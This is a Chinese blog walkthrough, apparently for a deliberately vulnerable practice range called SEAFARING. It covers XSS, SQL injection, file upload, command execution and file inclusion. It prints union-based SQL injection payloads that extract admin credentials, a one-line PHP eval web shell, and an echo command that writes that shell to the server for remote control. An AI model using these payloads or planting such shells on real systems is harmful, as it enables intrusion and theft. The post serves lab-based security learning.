当前位置: 首页 > news >正文

SEAFARING靶场漏洞攻略

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.lryc.cn/news/440439.html

相关文章:

  • ROS 编程入门的介绍
  • 第十一章 抽象类与接口
  • 请问企业的八大金刚系统是哪些?有什么共同点和区别?
  • 【入门】配置 Java 应用程序的完整指南
  • flutter widget 设置GestureDetector点击无效
  • 基于SpringBoot的在线教育平台的设计与实现
  • Django_Vue3_ElementUI_Release_004_使用nginx部署
  • Java抽象类的案例
  • 运维工程师面试整理-数据库
  • comfyui一键抠图工作流:让你告别PS!
  • 【Hot100】LeetCode—4. 寻找两个正序数组的中位数
  • 【LLM text2sql】浅看大模型用于text2sql的综述
  • Node js介绍
  • 企业编辑抖音百科词条有什么用?
  • 数据结构-链式二叉树-四种遍历
  • 【YashanDB知识库】数据库获取时间和服务器时间不一致
  • 十大排序之:冒泡排序
  • 【MPC】无人机模型预测控制复现Data-Driven MPC for Quadrotors项目(Part 1)
  • 微信小程序开发——比较两个数字大小
  • Java多线程3
  • node+Vue项目环境创建
  • 云智AI人工智能平台——与众不同之处
  • 国庆节有什么好物值得入手?精选国庆节必选好物合集
  • 并发安全与锁
  • 细胞分裂检测系统源码分享
  • openssl 生成多域名 多IP 的数字证书
  • 电影评论|基于springBoot的电影评论网站设计与实现(附项目源码+论文+数据库)
  • 【C++】虚函数
  • esxi虚拟机启用cbt备份(增量备份)
  • mysql 8.0 时间维度表生成(可运行)